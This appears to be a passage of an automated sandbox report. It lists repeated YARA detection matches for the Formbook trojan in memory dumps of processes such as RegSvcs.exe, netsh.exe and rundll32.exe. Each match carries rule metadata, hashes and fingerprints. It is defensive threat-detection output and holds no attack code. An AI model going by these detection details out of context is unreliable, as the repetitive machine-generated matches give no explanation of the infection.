              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 3360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: ipconfig.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: rundll32.exe PID: 5336, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: netsh.exe PID: 1508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: netsh.exe PID: 5472, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
